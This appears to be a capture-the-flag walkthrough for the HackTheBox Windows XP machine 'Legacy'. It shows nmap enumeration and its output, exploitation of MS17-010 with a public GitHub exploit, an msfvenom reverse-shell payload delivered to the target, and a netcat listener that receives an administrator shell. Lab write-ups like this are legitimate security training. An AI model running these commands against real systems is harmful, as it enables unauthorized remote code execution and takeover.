Today we’re going to solve another window machine called “Legacy” by ch4p . It’s available on Hackthebox retired section for practice . Let ‘s get started and learn how to solve the lab .
Level : Easy
- Network Scanning
- Performing Nmap Script scan
- setup virtual environment
- exploiting MS17-010 Vulnerability
- Privilege Escalation
- Administrator reverse shell using netcat
IP Address : 10.129.130.212
After connecting to Hackthebox network using there VPN connection , we can start our war . Without wasting too much time let start with Nmap to enumerate the running service on target machine .
Using Nmap we perform the aggressive scan which do version scanning, Os detection scan, Time template T4,trace route .
nmap -A 10.129.130.212 -Pn
Nmap scan report for 10.129.130.212 Host is up (0.17s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: 5d00h27m40s, deviation: 2h07m16s, median: 4d22h57m40s |_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:a6:d3 (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2021-04-25T21:15:31+03:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2)
In output it show that SMB service is running on port 445 on target machine and it also show that target machine is window XP machine , as i see the window XP there are very famous exploit in the market like eternal blue , ms17-010 ,etc . For confirming we gonna try the Nmap script scan .
Now we know that target machine is window XP and for confirming we gonna see for any famous vulnerability , for that Nmap script scan is good . Nmap Scripts are located at /usr/share/nmap/scripts .
nmap --script smb-vuln* -p 445 10.129.130.212 -Pn
In the output there are some serious vulnerability listed like MS08-067 and MS17-010 , so we are going to exploit MS17-010 without using the Metasploit .
Nmap scan report for 10.129.130.212 Host is up (0.17s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
For exploitation this machine we are going to use the exploit which is available to GitHub . Now this exploit is created in python2 and it require some libraries like impacket , pycrypto . For that virtual environment has to setup and here virtualenv program help .Once you created the environment then you can activate that environment using source utility program . Here python2 is used as interpreter because in latest Kali python3 is set as global interpreter and our exploit is in python2 .
why we use virtual environment ? For that you can check out this .
virtualenv -p python2 venv source venv/bin/activate pip install impacket pip install pycrypto
Once our environment is setup successfully we can work on our exploit , for that the exploit we use you can get from GitHub . After getting our exploit we have to check weather our exploit is connecting to our target machine or not or does all the prelibraries are installed properly or not so to check , checker.py is used .
If everything is good then we can exploit it easily .
git clone https://github.com/helviojunior/MS17-010.git cd MS17-010 python checker.py legacy.htb
so our exploit is working fine and all the libraries are installed and its reachable to our target machine so let exploit the machine and get the shell .
Here reverse netcat shell payload are used which is created by using msfvenom utility .
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4445 -f exe > shell.exe python send_and_execute.py legacy.htb shell.exe 445 browser
As our payload dilvery is done we get the netcat revese shell using nc .
nc -lvnp 4445 type "Administrator\Desktop\root.txt" type "john\Desktop\User.txt"
Finally we successfully exploited the machine .